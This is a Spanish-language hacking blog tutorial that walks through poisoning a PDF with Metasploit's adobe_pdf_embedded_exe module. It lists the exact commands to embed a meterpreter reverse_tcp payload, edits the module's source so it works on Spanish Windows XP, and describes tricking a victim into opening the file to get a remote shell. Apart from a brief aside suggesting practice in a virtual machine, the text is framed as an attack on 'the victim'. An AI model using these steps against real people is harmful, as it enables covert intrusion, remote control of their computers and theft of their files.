Sie sind auf Seite 1von 5

hacking.

land

Envenenamiento de PDF (Infectando PDF) -


Obtención de shell inversa
5-6 minutos

Hoy les acerco un tutorial bastante interesante para los novatos


(como su humilde servidor). Se trata de un step by step (paso a paso) sobre como envenenar un PDF
para obtener una shell inversa en nuestro sistema víctima.
Para lograrlo, utilizaremos cualquier distro con metasploit instalado
Aqui vamos...
Para encontrar unas de las amenazas mas frecuentes en una empresa, debemos pensar en las
vulnerabilidades a las que se pueden enfrentar los empleados, si el software de nuestra empresa no
esta correctamente actualizado, general mente las empresas solo actualizan los parches de
seguridad de los sistemas operativos y no tienen, encuenta que el sistema operativo tienen mucho
mas software que necesita ser actualizado, con sus respectivas actualizaciones de seguridad. hoy les
mostrare como con un poco de ingeniería social podremos obtener una shell reversa o un vnc.
utilizando como herramienta nuestro querido Metasploit, utilizando el exploit
“adobe_pdf_empedded_exe” con lo cual envenenaremos un pdf tan comun en las empresas como en
nuestros hogares anteriormente era mucho mas seguro el pdf que un archivo de word pero hoy en
dia es todo lo contrario lo mas inseguro que existe es pdf.
Lo bueno de el modulo “adobe_pdf_embedded_exe”, es que nos permitirá embeber el payload en
cualquier PDF existente, algo útil es buscar un pdf en google
Otra aspecto a tener en cuenta, es que este modulo tiene rank de Execellent, por lo que es excelente
opción, ante los demás exploits client side attacks que son menos estables.
Después de tener un pdf lo que debemos realizar es abrir metasploit y haremos lo siguiente:
use windows/fileformat/adobe_pdf_embedded_exe
set INFILENAME /tmp/nuestropdf.pdf
set FILENAME nuevonombre.pdf
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST nuestraip
exploit

en la primera opción INFILENAME colocamos la ruta de nuestro pdf a utilizar, y en la opciòn FILENAME

colocamos el nombre al pdf resultante, en LHOST colocamos nuestra IP


luego dejamos escuchando por la conexiòn reversa que se va a generar una vez que la victima abra
el pdf:

Luego cuando la víctima abra el PDF, le aparecerá lo siguiente:

Bujuajajajajajaja (risa malvada) XD

Bueno, al momento de presionar “OPEN” el payload serà dropeado en el sistema, y un script


intentara abrirlo. como el exploit esta realizado para windows xp SP3 English (Ingles), lo que
haremos entonces es modificar el warning que el payload es buscado dentro de “Desktop”
(Escritorio),”My Documents” (Mis documentos) .
Para que funcione con xp en español, debemos modificar el código del mòdulo, los directorios ”
Escritorio” y “Mis Documentos”, y realizamos de nuevo todo el procedimiento sobre el pdf:

esta es la ruta en backtrack


/framework3/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb

y modificamos las siguiente linea.


dirs = [ "Desktop", "My Documents", "Documents" ]

por
dirs = [ "Desktop", "My Documents", "Documents", "Escritorio", "Mis
Documentos" ]

Si se ejecutará el playload, obtendremos un Meterpreter

y como podemos ver obtenemos una shell inversa con Meterpreter!


Todo hermoso, muy lindo, pero más de uno se preguntara...¿Y que es una shell inversa? ¿Para que
me sirve? Paciencia amigo, segui leyendo...
Basicamente una shell inversa es lograr que, tras ejecutar un "soft" (por llamarlo de algún modo) en
la pc remota, esta intente conectarse con nosotros otorgandonos el tan preciado teroso...una shell.
De este modo, podrás manejar o controla la pc como si estuviera delante tuyo, teniendo en tus
manos el PODER de alcanzar cualqueir archivo, documento, etc
Todo muy didáctico y hermoso hermano...pero no se que es una shell
Bueno...viendo que no estás con muchas ganas de acudir a Google, voy a hacerlo por vos
Según Wiki...una shell es:
...es el término usado en informática para referirse a un intérprete de comandos, el cual consiste
en la interfaz de usuario tradicional de los sistemas operativos basados en Unix y similares como
GNU/Linux.
Mediante las instrucciones que aporta el intérprete, el usuario puede comunicarse con el núcleo y
por extensión, ejecutar dichas órdenes, así como herramientas que le permiten controlar el
funcionamiento de la computadora.Más info en: http://es.wikipedia.org/wiki/Shell_de_UNIX
Ya estas poniendo cara de malvado...tranquilo...hacé tus practicas en una maquina virtual. Si no
sabés como instalar una...buscá en el foro, hay muchos tutoriales.

Envenenamiento de PDF (Infectando PDF) - Obtención de shell inversa Reviewed by


Zion3R on 14:18 Rating: 5

Das könnte Ihnen auch gefallen